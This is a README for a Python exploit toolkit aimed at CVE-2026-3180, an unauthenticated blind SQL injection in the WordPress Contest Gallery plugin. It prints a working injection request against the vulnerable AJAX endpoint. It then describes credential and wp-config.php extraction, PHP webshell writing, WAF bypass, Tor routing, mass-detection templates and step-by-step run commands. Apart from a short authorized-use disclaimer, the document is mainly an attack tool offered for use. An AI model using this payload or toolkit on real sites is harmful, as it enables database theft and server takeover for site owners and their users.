
Complete exploitation toolkit for CVE-2026-3180 - WordPress Contest Gallery SQL Injection vulnerability. Features automated data extraction, WAF bypass, reverse shell, SQLMap integration, Burp extension generation, and reporting for penetration testing and security research.
Proof-of-concept assessment tool for CVE-2026-3180
Author: Sudeepa Wanigarathna · Original discovery: cardosource
[!IMPORTANT] Authorized use only. This tool is for security research, education, and testing systems you own or have explicit written permission to assess. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse.
CVE-2026-3180 is a high-severity, unauthenticated blind SQL injection in the WordPress Contest Gallery plugin. The flaw exists in the post_cg1l_resend_unconfirmed_mail_frontend AJAX handler, where the cgl_mail parameter is passed to a SQL query without proper sanitization.
This repository provides a full-featured Python PoC (v2.0) for authorized security professionals to validate impact, extract WordPress data, generate reports, and integrate with industry-standard tooling (SQLMap, Burp Suite, Nuclei).
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-3180 |
| CVSS | 7.5 (High) |
| Attack Vector | Network — unauthenticated |
| Impact | Confidentiality breach, database read, credential theft |
| Affected Product | WordPress Contest Gallery plugin |
| Affected Versions | 28.1.4 and earlier |
| Vulnerability Type | Blind SQL Injection |
| DBMS | MySQL / MariaDB |
| Field | Value |
|---|---|
| URL | /wp-admin/admin-ajax.php |
| Method | POST |
| Action | post_cg1l_resend_unconfirmed_mail_frontend |
| Vulnerable Parameter | cgl_mail |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.example
Content-Type: application/x-www-form-urlencoded
action=post_cg1l_resend_unconfirmed_mail_frontend
&cgl_mail=qualquer'OR/**/1=1#@teste.com
&cgl_page_id=1
&cgl_activation_key=
&cg_nonce=%20
| Capability | Description |
|---|---|
| Vulnerability detection | Boolean, time-based, error-based, union, and stacked query tests |
| Blind extraction | Binary-search character extraction via boolean inference |
| Full data dump | Users, database metadata, options, plugins, themes, posts, tables |
| Interactive SQL shell | Run arbitrary SELECT queries against the backend |
| wp-config.php extraction | LOAD_FILE() attempts against common paths |
| Reverse shell | PHP webshell write via INTO OUTFILE / DUMPFILE (when permitted) |
| Capability | Description |
|---|---|
| WAF bypass | 15+ encoding and obfuscation techniques |
| Multi-threading | Configurable worker threads for faster extraction |
| Rate limiting | Configurable delay between requests |
| Retry logic | Automatic retries on transient failures |
| User-Agent rotation | Random browser fingerprints per request |
| Proxy support | HTTP/SOCKS proxies and Tor (socks5h://127.0.0.1:9050) |
| Capability | Description |
|---|---|
| Report generation | JSON and HTML reports with extraction summaries |
| SQLMap integration | Auto-generated SQLMap command with tampers |
| Burp Suite extension | Generator + standalone burp_contest_gallery.py |
| Nuclei template | YAML template for mass detection |
| Metasploit module | Ruby auxiliary module (contest_gallery_sqli.rb) |
| Shell automation | Bash scripts for curl-based and SQLMap workflows |
| Capability | Description |
|---|---|
| Colored CLI output | Structured logging with severity levels |
| Progress tracking | Real-time metrics (requests, timing, extraction speed) |
| Quiet / verbose modes | Suitable for scripting and debugging |
| Signal handling | Graceful cleanup on Ctrl+C |
| Docker ready | Containerized deployment support |
| CI/CD pipeline ready | Exit codes and JSON output for automation |
pip| Tool | Purpose |
|---|---|
| SQLMap | Automated SQL injection |
| Burp Suite | Manual testing & extension hosting |
| Nuclei | Template-based scanning |
| Hashcat | Offline hash cracking |
| Tor | Anonymous routing (--proxy tor) |
git clone https://github.com/CerberusMrXi/WP-Contest-Gallery-28.1.4-Exploit.git
cd WP-Contest-Gallery-28.1.4-Exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2026-3180.py --help
Required (runtime):
requests>=2.31.0
Recommended (from requirements.txt):
colorama>=0.4.6
tqdm>=4.65.0
pyyaml>=6.0
python-dateutil>=2.8.2
urllib3>=2.0.0
The main exploit uses only the Python standard library plus
requests. Additional packages enhance output and reporting.
Replace
http://target.examplewith a lab or authorized target only.
python3 cve-2026-3180.py http://target.example --scan
python3 cve-2026-3180.py http://target.example
python3 cve-2026-3180.py http://target.example --dump users
python3 cve-2026-3180.py http://target.example --sql-shell
python3 cve-2026-3180.py http://target.example --report html -o assessment.html
python3 cve-2026-3180.py http://target.example --proxy http://127.0.0.1:8080 -v
python3 cve-2026-3180.py http://target.example --scan
Runs boolean, time-based, and error-based detection without full extraction.